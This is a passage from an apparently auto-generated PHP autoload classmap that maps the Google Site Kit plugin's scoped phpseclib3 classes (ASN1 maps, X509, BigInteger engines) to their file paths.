'/phpseclib/phpseclib/phpseclib/Exception/UnsupportedCurveException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\UnsupportedFormatException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/UnsupportedFormatException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Exception\\UnsupportedOperationException' => $baseDir . '/phpseclib/phpseclib/phpseclib/Exception/UnsupportedOperationException.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ANSI' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ANSI.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Element' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Element.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AccessDescription' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AccessDescription.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AdministrationDomainName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AdministrationDomainName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AlgorithmIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AlgorithmIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AnotherName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AnotherName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Attribute' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Attribute.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AttributeType' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeType.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AttributeTypeAndValue' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeTypeAndValue.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AttributeValue' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeValue.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Attributes' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Attributes.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AuthorityInfoAccessSyntax' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AuthorityInfoAccessSyntax.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\AuthorityKeyIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AuthorityKeyIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\BaseDistance' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BaseDistance.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\BasicConstraints' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BasicConstraints.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\BuiltInDomainDefinedAttribute' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInDomainDefinedAttribute.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\BuiltInDomainDefinedAttributes' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInDomainDefinedAttributes.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\BuiltInStandardAttributes' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInStandardAttributes.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CPSuri' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CPSuri.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CRLDistributionPoints' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLDistributionPoints.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CRLNumber' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLNumber.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CRLReason' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CRLReason.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertPolicyId' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertPolicyId.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Certificate' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Certificate.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificateIssuer' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateIssuer.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificateList' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateList.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificatePolicies' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificatePolicies.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificateSerialNumber' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateSerialNumber.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificationRequest' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificationRequest.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CertificationRequestInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificationRequestInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Characteristic_two' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Characteristic_two.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\CountryName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CountryName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Curve' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Curve.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DHParameter' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DHParameter.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DSAParams' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAParams.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DSAPrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAPrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DSAPublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAPublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DigestInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DigestInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DirectoryString' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DirectoryString.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DisplayText' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DisplayText.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DistributionPoint' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DistributionPoint.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DistributionPointName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DistributionPointName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\DssSigValue' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DssSigValue.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ECParameters' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECParameters.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ECPoint' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECPoint.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ECPrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECPrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\EDIPartyName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EDIPartyName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\EcdsaSigValue' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EcdsaSigValue.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\EncryptedData' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EncryptedData.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\EncryptedPrivateKeyInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EncryptedPrivateKeyInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ExtKeyUsageSyntax' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtKeyUsageSyntax.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Extension' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Extension.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ExtensionAttribute' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtensionAttribute.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ExtensionAttributes' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtensionAttributes.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Extensions' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Extensions.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\FieldElement' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/FieldElement.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\FieldID' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/FieldID.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\GeneralName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\GeneralNames' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralNames.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\GeneralSubtree' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralSubtree.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\GeneralSubtrees' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralSubtrees.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\HashAlgorithm' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/HashAlgorithm.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\HoldInstructionCode' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/HoldInstructionCode.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\InvalidityDate' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/InvalidityDate.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\IssuerAltName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/IssuerAltName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\IssuingDistributionPoint' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/IssuingDistributionPoint.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\KeyIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\KeyPurposeId' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyPurposeId.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\KeyUsage' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyUsage.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\MaskGenAlgorithm' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/MaskGenAlgorithm.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Name' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Name.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\NameConstraints' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NameConstraints.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\NetworkAddress' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NetworkAddress.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\NoticeReference' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NoticeReference.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\NumericUserIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NumericUserIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ORAddress' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ORAddress.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\OneAsymmetricKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OneAsymmetricKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\OrganizationName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OrganizationName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\OrganizationalUnitNames' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OrganizationalUnitNames.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\OtherPrimeInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OtherPrimeInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\OtherPrimeInfos' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OtherPrimeInfos.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PBEParameter' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBEParameter.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PBES2params' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBES2params.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PBKDF2params' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBKDF2params.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PBMAC1params' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBMAC1params.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PKCS9String' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PKCS9String.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Pentanomial' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Pentanomial.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PersonalName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PersonalName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PolicyInformation' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyInformation.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PolicyMappings' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyMappings.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PolicyQualifierId' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyQualifierId.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PolicyQualifierInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PolicyQualifierInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PostalAddress' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PostalAddress.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Prime_p' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Prime_p.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PrivateDomainName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateDomainName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PrivateKeyInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKeyInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PrivateKeyUsagePeriod' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKeyUsagePeriod.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PublicKeyAndChallenge' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKeyAndChallenge.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\PublicKeyInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKeyInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RC2CBCParameter' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RC2CBCParameter.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RDNSequence' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RDNSequence.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RSAPrivateKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSAPrivateKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RSAPublicKey' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSAPublicKey.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RSASSA_PSS_params' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RSASSA_PSS_params.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\ReasonFlags' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ReasonFlags.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RelativeDistinguishedName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RelativeDistinguishedName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\RevokedCertificate' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RevokedCertificate.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SignedPublicKeyAndChallenge' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SignedPublicKeyAndChallenge.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SpecifiedECDomain' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SpecifiedECDomain.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SubjectAltName' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectAltName.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SubjectDirectoryAttributes' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectDirectoryAttributes.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SubjectInfoAccessSyntax' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectInfoAccessSyntax.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\SubjectPublicKeyInfo' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectPublicKeyInfo.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\TBSCertList' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TBSCertList.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\TBSCertificate' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TBSCertificate.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\TerminalIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TerminalIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Time' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Time.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Trinomial' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Trinomial.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\UniqueIdentifier' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/UniqueIdentifier.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\UserNotice' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/UserNotice.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\Validity' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Validity.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\netscape_ca_policy_url' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_ca_policy_url.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\netscape_cert_type' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_cert_type.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\ASN1\\Maps\\netscape_comment' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_comment.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\File\\X509' => $baseDir . '/phpseclib/phpseclib/phpseclib/File/X509.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\Base' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Base.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\BuiltIn' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/BuiltIn.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\DefaultEngine' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/DefaultEngine.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\OpenSSL' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/OpenSSL.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\Reductions\\Barrett' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Reductions/Barrett.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\BCMath\\Reductions\\EvalBarrett' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/BCMath/Reductions/EvalBarrett.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\Engine' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/Engine.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\GMP' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/GMP.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\GMP\\DefaultEngine' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/GMP/DefaultEngine.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\OpenSSL' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/OpenSSL.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP32' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP32.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP64' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP64.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Base' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Base.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\DefaultEngine' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/DefaultEngine.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Montgomery' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Montgomery.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\OpenSSL' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/OpenSSL.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\Barrett' => $baseDir . '/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Barrett.php', 'Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\PHP\\Reductions\\Classic' => $baseDir . 